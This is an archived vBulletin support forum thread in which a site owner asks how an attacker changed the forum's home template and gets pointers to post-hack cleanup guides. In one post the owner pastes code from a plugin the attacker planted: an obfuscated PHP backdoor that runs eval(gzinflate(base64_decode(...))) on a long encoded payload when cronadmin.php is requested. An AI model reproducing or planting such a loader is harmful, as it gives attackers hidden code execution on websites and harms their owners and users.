vb.org Archive
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB4 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=251)
-   -   Hacker has changed my FORUMHOME template - how? (https://vborg.vbsupport.ru/showthread.php?t=303322)

VBUsers 10-13-2013 01:06 AM
Hacker has changed my FORUMHOME template - how?
 
How has a hacker been able to change my forum home template to point to his forum? I reverted the template and fixed the issue but I don't know how he got in or what to change to stop him from doing this. Please help

hydrocanna.com

ozzy47 10-13-2013 01:10 AM
You sure you cleaned out your site completely after you reported being hacked on Oct 4th?

VBUsers 10-13-2013 01:15 AM
i removed all the plugins that I felt were out of date

I removed the install folder after upgrading to 4.2.2

I changed all admin pw and cpanel pw

what am i missing?

ozzy47 10-13-2013 01:20 AM
Did you follow all the items in the following links thoroughly?

http://www.vbulletin.com/forum/blogs...ve-been-hacked

http://www.vbulletin.com/forum/blogs...vbulletin-site

VBUsers 10-13-2013 01:51 AM
I have for the most part and I'm trying to go through the files that don't belong on my server but not sure if i should delete that many files. Its quite a bit a few of em. Do i need to look at my plugins next?

how was he able to change the forum home? are there that many entrances for him to use that we can't narrow it down ?

thank you so much for your help. Ive been battling this for months now. It has def killed my community

Max Taxable 10-13-2013 01:53 AM
Quote:
Originally Posted by VBUsers (Post 2452773)
I have for the most part and I'm trying to go through the files that don't belong on my server but not sure if i should delete that many files. Its quite a bit a few of em. Do i need to look at my plugins next?

how was he able to change the forum home? are there that many entrances for him to use that we can't narrow it down ?

thank you so much for your help. Ive been battling this for months now. It has def killed my community
It's not only "narrowed down" it is explained explicitly, at the links provided.:D

ozzy47 10-13-2013 01:57 AM
Well I would follow everything in the guides, and then you should be good to go.

There is no way of knowing exactly how the forumhome was changed, but at least reverting is seems to have fixed it.

If you have not got any emails from vb.org about a potential exploit in any mods you are using, then you should be safe. You will only get the email if you have mods you are using, marked as installed.

VBUsers 10-13-2013 02:05 AM
i found that the hacker got into the admincp and edited a plugin that has this code in it

Code:
if (strpos($_SERVER['PHP_SELF'],'cronadmin.php')) {

eval(gzinflate(base64_decode('7X37d9s20ujP6Tn5HxCvt5K3tl6O28aJ3dryS45fsWQ7dpLjQ5GUxJgPlaQsK3v6/e13Bi+CT1FJ09373evdMiI4mBkMBoMBMADq9Z6pORdd0h2Ztv38h3p9d0Yu7IlDfiRv/dm4Z719/oPp+55/75tjzw8td1htrLx+/sM/9JFh+dVKBV/q9a7nmKSvBZZOHjW/Ejz/wRqQ6ovfl+8P93sfKmMtHFU+rZB/P/+BwN8yZCVbpG2bmrsHWIZmqE+N6gri+pOYdmDmQcbxIfjzH5Z9zwtTcN39y+v9yw+VvfP21en+We/+8vy8x/IsG56jWS7AR2BHvd7F/dF5F0AQItB9axzGILrty85F7/5s53SfwQwmtn0/8e0Y1OX+u6v9bu/+6rKjYmoBEIjHdDXHrPI0ykpg+o8mvMVJ0X/vd/b2LhmSSZCCudw/Pe/tKzDTkac5FsAMJq4eWp57bz5ZQRhUl8ZeYD3dg5DH04llLK2Q30g8qSpfTXxbWSGbxHwy9eoSQ7q0sjABDv2hgiWufMpEaFiB1rdNA1BaroX5qxWedi9oBFzBLkwQdF/TH4juua6ph4RXUX9GTjx/D2H2Xd0zAB1ULcr655dk4PkI/2i6lunqJtDs62PAdB94E183gfBSZ7b/aLw/m520jsd969X07v1x0NlpvIU0u7NvX5x/Hvf6rTP/7v27XzC9M9sZdg52Z9r725edtvdH5m8Kt3t89XBw3tkf7b5rhAdX9unwqnHQ7jUvdy8bV8N3rVeTvnP92Wjvtm9vzvzOwZl3d/MUdNqAX/zH8Hzuty7tzuHxxvnD06P+8G6498773DkwgL+D2V135+fe4avZZbu5d3r47otuNc+v203d3HuYxnAt9t9Z2zodXt40R9rNlOHf3x1rR2eNu5uD8MQ5e+x3GQzy0ofvd/u7vf7hwWdt3RjpzvWpdrPRNPe8R+3wVXjXfTXVnVeu7hyEkO4et3eZnA8vP5+4uwErZyO86DUiuewfj25bwfCdAzhbl4/99c7wqjWy+4fToeGeDk+7L6cok84+k0m/dTvsXh/v9qzdzrurs5PL6+MeyHT33cOrq3dXxkFnr/HqpNtgskN6zesvtzeGfW7tPtzONqb99m6/e/jqi3HQGN40dx9199Lg9Q3lPDuAsgzvDk8nOtA/7XXWTz7vTE7bL586e52n08/7f40c9vZnZ7OXU4q7uzMDOk//GdkEf7zv7nbv3kM9H92N+44+pLLZ3xj1b64o3M1sbHT24buzYd+uXyLM5MR6GZdNhKunHx6s9x17cjfb7WmH10Gf6thZ/62tlOvw+qFz
the plugin has a lot more code that i cant post in here. is this plugin the hack they keep getting in from? I deleted this a week ago. how is it back?

VBUsers 10-13-2013 02:07 AM
1 Attachment(s)
here is the screen shot from the log. how does he not have a username?

I blocked the ip but im sure thats not a big deal

CharlieDelta 10-13-2013 02:08 AM
There is a hole somewhere. Could be a file hidden on your server. You need to thoroughly check every file and compare the dates, etc..
Make sure you follow the suggestions to a "T" that Ozzy linked.


All times are GMT. The time now is 06:56 PM.
Page 1 of 2 1 2
Show 40 post(s) from this thread on one page

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01125 seconds
  • Memory Usage 1,741KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (1)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 
Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete